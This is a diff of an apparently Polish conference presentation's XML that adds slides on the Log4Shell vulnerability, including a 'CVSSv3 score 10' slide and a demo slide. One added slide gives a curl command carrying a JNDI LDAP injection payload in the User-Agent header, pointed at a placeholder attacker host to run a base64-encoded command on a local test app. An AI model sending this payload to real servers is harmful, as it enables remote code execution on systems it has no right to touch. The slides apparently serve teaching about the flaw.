+        <p:nvSpPr>
+          <p:cNvPr id="15" name="TextBox 14">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B06BDE-1BE9-E344-8130-1F79ABFEF699}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="8313311" y="2797868"/>
+            <a:ext cx="2145139" cy="307777"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>L</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-PL" dirty="0"/>
+              <a:t>okalna aplikacja docker</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3592641118"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide24.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:bg>
+      <p:bgPr>
+        <a:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </a:blipFill>
+        <a:effectLst/>
+      </p:bgPr>
+    </p:bg>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 134"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="135" name="Google Shape;135;p9"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2943225" y="365125"/>
+            <a:ext cx="8410574" cy="1325563"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="ctr" anchorCtr="0">
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:schemeClr val="dk1"/>
+              </a:buClr>
+              <a:buSzPts val="3800"/>
+              <a:buFont typeface="Open Sans"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
+              <a:t>Execute</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
+              <a:t>command</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
+              <a:t>line</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="3800" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="3800" dirty="0" err="1"/>
+              <a:t>payload</a:t>
+            </a:r>
+            <a:endParaRPr sz="3800" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="136" name="Google Shape;136;p9"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2943224" y="1825625"/>
+            <a:ext cx="8761095" cy="4165600"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="63500" lvl="0" indent="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:buClr>
+                <a:srgbClr val="292929"/>
+              </a:buClr>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+                <a:latin typeface="Arial"/>
+                <a:ea typeface="Arial"/>
+                <a:cs typeface="Arial"/>
+                <a:sym typeface="Arial"/>
+              </a:rPr>
+              <a:t>attackhost</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+                <a:latin typeface="Arial"/>
+                <a:ea typeface="Arial"/>
+                <a:cs typeface="Arial"/>
+                <a:sym typeface="Arial"/>
+              </a:rPr>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+                <a:latin typeface="Arial"/>
+                <a:ea typeface="Arial"/>
+                <a:cs typeface="Arial"/>
+                <a:sym typeface="Arial"/>
+              </a:rPr>
+              <a:t>x.x.x.x</a:t>
+            </a:r>
+            <a:endParaRPr lang="pl-PL" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="0070C0"/>
+              </a:solidFill>
+              <a:latin typeface="Arial"/>
+              <a:ea typeface="Arial"/>
+              <a:cs typeface="Arial"/>
+              <a:sym typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="63500" lvl="0" indent="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:buClr>
+                <a:srgbClr val="292929"/>
+              </a:buClr>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="292929"/>
+              </a:solidFill>
+              <a:latin typeface="Arial"/>
+              <a:ea typeface="Arial"/>
+              <a:cs typeface="Arial"/>
+              <a:sym typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buSzPts val="2800"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>curl -H 'User-Agent:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buSzPts val="2800"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>${</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>jndi:ldap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>://</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>attackhost</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>:1389/Basic/Command/Base64/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>xxx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>}’ localhost:9000</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buSzPts val="2800"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-GB" dirty="0">
+              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buSzPts val="2800"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>xxx – base64 encoded command to execute</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buSzPts val="2800"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>Np. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>touch /</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>tmp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" dirty="0">
+                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
+              </a:rPr>
+              <a:t>/hack</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="1000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:schemeClr val="dk1"/>
+              </a:buClr>
+              <a:buSzPts val="2800"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="pl-PL" dirty="0">
+              <a:latin typeface="Open Sans"/>
+              <a:ea typeface="Open Sans"/>
+              <a:cs typeface="Open Sans"/>
+              <a:sym typeface="Open Sans"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="1000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClr>
+                <a:schemeClr val="dk1"/>
+              </a:buClr>
+              <a:buSzPts val="2800"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr dirty="0">
+              <a:latin typeface="Open Sans"/>
+              <a:ea typeface="Open Sans"/>
+              <a:cs typeface="Open Sans"/>
+              <a:sym typeface="Open Sans"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4097473106"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
 <file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
@@ -22206,7 +22317,7 @@
                 <a:sym typeface="Arial"/>
                 <a:hlinkClick r:id="rId4"/>
               </a:rPr>
-              <a:t>http://34.118.109.39:9000</a:t>
+              <a:t>http://x.x.x.x:9000</a:t>
             </a:r>
             <a:endParaRPr lang="pl-PL" dirty="0">
               <a:solidFill>
@@ -23471,7 +23582,7 @@
                 <a:cs typeface="Open Sans"/>
                 <a:sym typeface="Open Sans"/>
               </a:rPr>
-              <a:t>2 konkursy</a:t>
+              <a:t>konkurs</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -23631,66 +23742,6 @@
         </p:spPr>
       </p:pic>
     </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide30.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="15" name="Picture 14">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B7A4E04-69DE-4A4A-86B8-0D7FBA8D06ED}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="911087"/>
-            <a:ext cx="12192000" cy="5035826"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2911204887"/>
-      </p:ext>
-    </p:extLst>
   </p:cSld>
   <p:clrMapOvr>
     <a:masterClrMapping/>
@@ -24350,15 +24401,33 @@
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="pl-PL" sz="3800" b="1">
+              <a:rPr lang="pl-PL" sz="3800" b="1" dirty="0">
                 <a:latin typeface="Open Sans"/>
                 <a:ea typeface="Open Sans"/>
                 <a:cs typeface="Open Sans"/>
                 <a:sym typeface="Open Sans"/>
               </a:rPr>
-              <a:t>CVSSv3 score 10</a:t>
-            </a:r>
-            <a:endParaRPr sz="3800"/>
+              <a:t>CVSSv3 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="3800" b="1" dirty="0" err="1">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t>score</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="pl-PL" sz="3800" b="1" dirty="0">
+                <a:latin typeface="Open Sans"/>
+                <a:ea typeface="Open Sans"/>
+                <a:cs typeface="Open Sans"/>
+                <a:sym typeface="Open Sans"/>
+              </a:rPr>
+              <a:t> 10</a:t>
+            </a:r>
+            <a:endParaRPr sz="3800" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -24540,7 +24609,7 @@
     </p:bg>
     <p:spTree>
       <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 117"/>
+        <p:cNvPr id="1" name="Shape 87"/>
         <p:cNvGrpSpPr/>
         <p:nvPr/>
       </p:nvGrpSpPr>
@@ -24554,18 +24623,18 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="118" name="Google Shape;118;p7"/>
+          <p:cNvPr id="88" name="Google Shape;88;p2"/>
           <p:cNvSpPr txBox="1">
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph type="title"/>
+            <p:ph type="ctrTitle"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2943225" y="365125"/>
-            <a:ext cx="8410574" cy="1325563"/>
+            <a:off x="1524000" y="1122363"/>
+            <a:ext cx="9144000" cy="2387600"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -24576,7 +24645,7 @@
           </a:ln>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="ctr" anchorCtr="0">
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="b" anchorCtr="0">
             <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
@@ -24592,126 +24661,32 @@
                 <a:spcPts val="0"/>
               </a:spcAft>
               <a:buClr>
-                <a:schemeClr val="dk1"/>
+                <a:schemeClr val="lt1"/>
               </a:buClr>
               <a:buSzPts val="3800"/>
               <a:buFont typeface="Open Sans"/>
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="pl-PL" sz="3800" b="1">
-                <a:latin typeface="Open Sans"/>
-                <a:ea typeface="Open Sans"/>
-                <a:cs typeface="Open Sans"/>
-                <a:sym typeface="Open Sans"/>
-              </a:rPr>
-              <a:t>CVSSv3 score 10</a:t>
-            </a:r>
-            <a:endParaRPr sz="3800"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="1026" name="Picture 2" descr="log4shell">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52618105-8A9A-1947-BD4E-0587374B8EB9}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId4">
-            <a:extLst>
-              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-              </a:ext>
-            </a:extLst>
-          </a:blip>
-          <a:srcRect/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr bwMode="auto">
-          <a:xfrm>
-            <a:off x="3785870" y="0"/>
-            <a:ext cx="6310313" cy="6858000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:extLst>
-            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
-              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+              <a:rPr lang="pl-PL" dirty="0">
                 <a:solidFill>
-                  <a:srgbClr val="FFFFFF"/>
+                  <a:schemeClr val="bg1"/>
                 </a:solidFill>
-              </a14:hiddenFill>
-            </a:ext>
-          </a:extLst>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Rectangle 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA55744A-5B43-F84F-85B8-AB2DEB6E1AF1}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="10458450" y="5634990"/>
-            <a:ext cx="1733550" cy="1131570"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:schemeClr val="bg1"/>
-          </a:solidFill>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="2">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="1">
-            <a:schemeClr val="lt1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="accent6"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="dk1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="en-PL"/>
+              </a:rPr>
+              <a:t>Demo #1</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="bg1"/>
+              </a:solidFill>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1847450261"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4272318865"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
